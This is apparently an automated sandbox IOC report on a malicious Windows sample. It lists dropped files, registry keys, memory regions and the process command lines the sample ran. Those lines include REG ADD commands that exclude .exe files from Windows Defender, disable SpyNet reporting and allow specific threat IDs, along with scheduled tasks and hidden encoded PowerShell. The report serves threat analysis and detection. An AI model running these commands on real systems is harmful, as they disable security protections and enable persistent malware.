IOC Report
file.exe

loading gif

Files

File Path
Type
Category
Malicious
file.exe
PE32 executable (GUI) Intel 80386, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Windows\System32\GroupPolicy\gpt.ini
ASCII text
dropped
malicious
C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\avEZCOa.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\7zS3361.tmp\__data__\config.txt
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngtmqmma.n4d.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oq22ozvi.ndj.psm1
very short file (no magic)
dropped
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Windows\System32\GroupPolicy\Machine\Registry.pol
RAGE Package Format (RPF),
dropped
C:\Windows\Tasks\bGZpGlqvDNKjraWjlZ.job
data
dropped
C:\Windows\Temp\__PSScriptPolicyTest_aedgb5uc.4sx.psm1
very short file (no magic)
dropped
C:\Windows\Temp\__PSScriptPolicyTest_k13f2ewv.k03.ps1
very short file (no magic)
dropped
\Device\ConDrv
ASCII text, with CRLF, CR line terminators
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\AppData\Local\Temp\7zS3361.tmp\Install.exe
.\Install.exe
malicious
C:\Users\user\AppData\Local\Temp\7zS3B8F.tmp\Install.exe
.\Install.exe /S /site_id "525403"
malicious
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
malicious
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gUpzuvmWb" /SC once /ST 15:28:53 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gUpzuvmWb"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gUpzuvmWb"
malicious
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:15:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe\" d8 /site_id 525403 /S" /V1 /F
malicious
C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe
C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe d8 /site_id 525403 /S
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
malicious
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
malicious
C:\Users\user\Desktop\file.exe
C:\Users\user\Desktop\file.exe
C:\Windows\SysWOW64\forfiles.exe
C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\forfiles.exe
C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\gpscript.exe
gpscript.exe /RefreshSystemParam
There are 40 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
http://crl.m
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://github.com/Pester/Pester
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
PendingFileRenameOperations
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions
exe
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet
SpyNetReporting
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager
PendingFileRenameOperations
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
225451
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
256596
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
242872
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147749373
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147807942
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147735735
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147737010
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147737007
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147737503
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction
2147735503
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
33E6000
heap
page read and write
63C0000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
75B0000
trusted library allocation
page read and write
20EA3B91000
heap
page read and write
6300000
trusted library allocation
page read and write
2980000
heap
page read and write
5E60000
trusted library allocation
page read and write
6A80000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
2054AF36000
heap
page read and write
2EB0000
unkown
page readonly
72F0000
trusted library allocation
page read and write
20532750000
trusted library allocation
page read and write
3D8F000
trusted library allocation
page read and write
8D0000
remote allocation
page read and write
72F0000
trusted library allocation
page read and write
6AA0000
trusted library allocation
page read and write
6A65000
unkown
page read and write
20EA434C000
heap
page read and write
D1F000
stack
page read and write
650000
heap
page read and write
63C0000
trusted library allocation
page read and write
5EE5000
trusted library allocation
page read and write
3E39000
trusted library allocation
page read and write
71C0000
trusted library allocation
page read and write
10B0000
remote allocation
page read and write
7340000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
F60000
heap
page read and write
7FF9A5A10000
trusted library allocation
page execute and read and write
A3F000
stack
page read and write
10001000
direct allocation
page execute read
A47000
heap
page read and write
AFEA000
heap
page read and write
2C8145C0000
heap
page read and write
7700000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
52D000
stack
page read and write
20EA3ADF000
heap
page read and write
AFCF000
heap
page read and write
63B0000
trusted library allocation
page read and write
401000
unkown
page execute read
3910000
heap
page execute and read and write
D76000
unkown
page write copy
72B0000
trusted library allocation
page read and write
6BFA000
trusted library allocation
page read and write
6AC0000
trusted library allocation
page read and write
20530C70000
heap
page read and write
63C0000
trusted library allocation
page read and write
A20000
heap
page read and write
5EE0000
trusted library allocation
page read and write
63B5000
trusted library allocation
page read and write
20EA3AF0000
heap
page read and write
66D000
stack
page read and write
5E70000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
3F0E000
trusted library allocation
page read and write
131A000
unkown
page read and write
422000
unkown
page write copy
CB7000
heap
page read and write
910000
heap
page read and write
6C1B000
trusted library allocation
page read and write
3C55000
trusted library allocation
page read and write
F10000
heap
page read and write
940000
remote allocation
page read and write
20EA3B5C000
heap
page read and write
2DD0000
heap
page read and write
7442000
trusted library allocation
page read and write
C37FB8C000
stack
page read and write
7670000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
63A0000
trusted library allocation
page read and write
20EA4345000
heap
page read and write
6270000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
10B0000
heap
page read and write
1F10000
trusted library allocation
page read and write
6A30000
trusted library allocation
page read and write
73F0000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
38E0000
trusted library allocation
page read and write
63F4000
trusted library allocation
page read and write
7FF9A5B80000
trusted library allocation
page read and write
2054B0C0000
trusted library allocation
page read and write
20EA4355000
heap
page read and write
20EA3B24000
heap
page read and write
72D0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
20EA4311000
heap
page read and write
1499000
unkown
page read and write
63B6000
trusted library allocation
page read and write
B2C9000
heap
page read and write
20EA4421000
heap
page read and write
62E0000
trusted library allocation
page read and write
7FF9A5C00000
trusted library allocation
page read and write
30F9000
heap
page read and write
63F0000
trusted library allocation
page read and write
7280000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
7130000
trusted library allocation
page read and write
709E000
stack
page read and write
10C9000
heap
page read and write
2FF0000
unkown
page readonly
6270000
trusted library allocation
page read and write
7270000
trusted library allocation
page read and write
9E0000
remote allocation
page read and write
63B0000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
7570000
trusted library allocation
page read and write
20533C63000
trusted library allocation
page read and write
72F4000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
63C5000
trusted library allocation
page read and write
6AC0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
3F36000
trusted library allocation
page read and write
580000
unkown
page readonly
3D3E000
trusted library allocation
page read and write
20EA4352000
heap
page read and write
72B8000
trusted library allocation
page read and write
20EA3B45000
heap
page read and write
E1F000
stack
page read and write
9D000
stack
page read and write
7330000
trusted library allocation
page read and write
20EA3AAE000
heap
page read and write
7310000
trusted library allocation
page read and write
3F02000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
F9B78EC000
stack
page read and write
6A69000
trusted library allocation
page read and write
31FF000
stack
page read and write
6A70000
trusted library allocation
page read and write
EDCA5BE000
stack
page read and write
39DE000
stack
page read and write
2054B0D0000
trusted library allocation
page read and write
570000
remote allocation
page read and write
36B0000
heap
page read and write
20EA3BA4000
heap
page read and write
C00000
heap
page read and write
7300000
trusted library allocation
page read and write
BCE000
stack
page read and write
20EA3BCB000
heap
page read and write
20EA39F0000
trusted library allocation
page read and write
66D000
stack
page read and write
20EA4329000
heap
page read and write
20EA3B41000
heap
page read and write
2054B0C1000
trusted library allocation
page read and write
20EA3B3A000
heap
page read and write
6A70000
trusted library allocation
page read and write
105D000
stack
page read and write
63B5000
trusted library allocation
page read and write
2EA0000
unkown
page readonly
7300000
trusted library allocation
page read and write
20532707000
heap
page execute and read and write
580000
unkown
page readonly
20EA3B97000
heap
page read and write
5F00000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
7130000
trusted library allocation
page read and write
6A70000
unkown
page read and write
7FF9A5C30000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
6BF9000
trusted library allocation
page read and write
20EA3B40000
heap
page read and write
B319000
heap
page read and write
6270000
trusted library allocation
page read and write
20EA4AE0000
remote allocation
page read and write
20EA3B37000
heap
page read and write
1DBFD4FA000
heap
page read and write
6A90000
trusted library allocation
page read and write
2FA5000
heap
page read and write
A655ABC000
stack
page read and write
63B8000
unkown
page read and write
63C0000
unkown
page read and write
6A67000
trusted library allocation
page read and write
5E70000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
5EE5000
trusted library allocation
page read and write
7160000
trusted library allocation
page read and write
6A60000
unkown
page read and write
72D0000
trusted library allocation
page read and write
980000
heap
page read and write
3E0F000
trusted library allocation
page read and write
7360000
trusted library allocation
page read and write
D6BE000
stack
page read and write
63C0000
trusted library allocation
page read and write
3550000
heap
page read and write
7BE000
stack
page read and write
20EA3BBC000
heap
page read and write
B365000
heap
page read and write
6A90000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
20EA3BB4000
heap
page read and write
6AB0000
trusted library allocation
page read and write
63B0000
unkown
page read and write
2C814642000
heap
page read and write
7FE000
stack
page read and write
62A0000
trusted library allocation
page read and write
6A60000
unkown
page read and write
6A70000
trusted library allocation
page read and write
32D0000
trusted library allocation
page read and write
63B6000
trusted library allocation
page read and write
6290000
trusted library allocation
page read and write
20EA3B3C000
heap
page read and write
2054B0C4000
trusted library allocation
page read and write
6310000
trusted library allocation
page read and write
32DE000
stack
page read and write
6BF9000
trusted library allocation
page read and write
760000
unkown
page readonly
62F0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
20EA3A82000
heap
page read and write
1F11000
trusted library allocation
page read and write
A0E000
stack
page read and write
6A80000
trusted library allocation
page read and write
63B0000
unkown
page read and write
5EE0000
trusted library allocation
page read and write
7FF9A5C10000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
60A000
heap
page read and write
20EA3AFC000
heap
page read and write
6A70000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
63C5000
trusted library allocation
page read and write
B1B7000
trusted library allocation
page read and write
769E000
stack
page read and write
76C0000
trusted library allocation
page read and write
6A95000
trusted library allocation
page read and write
106E000
stack
page read and write
20530D23000
heap
page read and write
62C0000
trusted library allocation
page read and write
20EA3AEE000
heap
page read and write
6A76000
trusted library allocation
page read and write
3337000
heap
page read and write
72D0000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7360000
trusted library allocation
page execute and read and write
108F000
unkown
page read and write
B0000
heap
page read and write
CDBF000
stack
page read and write
63A0000
trusted library allocation
page read and write
20EA3AB4000
heap
page read and write
10D0000
heap
page read and write
20532ADF000
heap
page read and write
5E70000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
1030000
remote allocation
page read and write
AE0000
heap
page read and write
63C0000
unkown
page read and write
B319000
heap
page read and write
2054B0C0000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
10B4F000
direct allocation
page read and write
20EA3AF6000
heap
page read and write
17285202000
heap
page read and write
7FF9A5B90000
trusted library allocation
page read and write
7710000
trusted library allocation
page read and write
6A68000
trusted library allocation
page read and write
7280000
trusted library allocation
page read and write
20EA4AE0000
remote allocation
page read and write
72B0000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
6C0E000
trusted library allocation
page read and write
2FB0000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
62C5000
trusted library allocation
page read and write
5E80000
trusted library allocation
page read and write
3E78000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
20532744000
trusted library allocation
page read and write
6A6A000
trusted library allocation
page read and write
13A1000
unkown
page execute read
6A70000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
63B6000
trusted library allocation
page read and write
7570000
trusted library allocation
page read and write
3F61000
trusted library allocation
page read and write
20EA3A97000
heap
page read and write
7320000
trusted library allocation
page read and write
1A3A000
unkown
page read and write
6A60000
trusted library allocation
page read and write
7FF9A5BC0000
trusted library allocation
page read and write
540000
heap
page read and write
3CC000
stack
page read and write
20EA3ABE000
heap
page read and write
62B0000
trusted library allocation
page read and write
6300000
trusted library allocation
page read and write
2C814550000
heap
page read and write
7150000
trusted library allocation
page read and write
20532CEB000
trusted library allocation
page read and write
55A6CFE000
stack
page read and write
6A90000
trusted library allocation
page read and write
180000
remote allocation
page read and write
820FBDB000
stack
page read and write
C5E000
stack
page read and write
6A90000
trusted library allocation
page read and write
1DF8CA20000
remote allocation
page read and write
62C0000
trusted library allocation
page read and write
7355000
trusted library allocation
page read and write
20EA4403000
heap
page read and write
B6E000
stack
page read and write
B33E000
heap
page read and write
7FF9A5950000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
94F000
unkown
page read and write
6A60000
unkown
page read and write
1030000
remote allocation
page read and write
63C3000
trusted library allocation
page read and write
5E70000
trusted library allocation
page read and write
4AF1000
trusted library allocation
page read and write
6C09000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
2F7F000
unkown
page read and write
20EA3ADD000
heap
page read and write
63C0000
unkown
page read and write
757A000
trusted library allocation
page read and write
4E0000
remote allocation
page read and write
20EA3A81000
heap
page read and write
20EA3BBE000
heap
page read and write
20EA3BF9000
heap
page read and write
6A60000
trusted library allocation
page read and write
131B000
unkown
page write copy
6A70000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
2EC0000
unkown
page read and write
EDCB00E000
stack
page read and write
6A60000
trusted library allocation
page read and write
3CB4000
trusted library allocation
page read and write
20EA3AF7000
heap
page read and write
D50000
unkown
page read and write
10C0000
trusted library allocation
page read and write
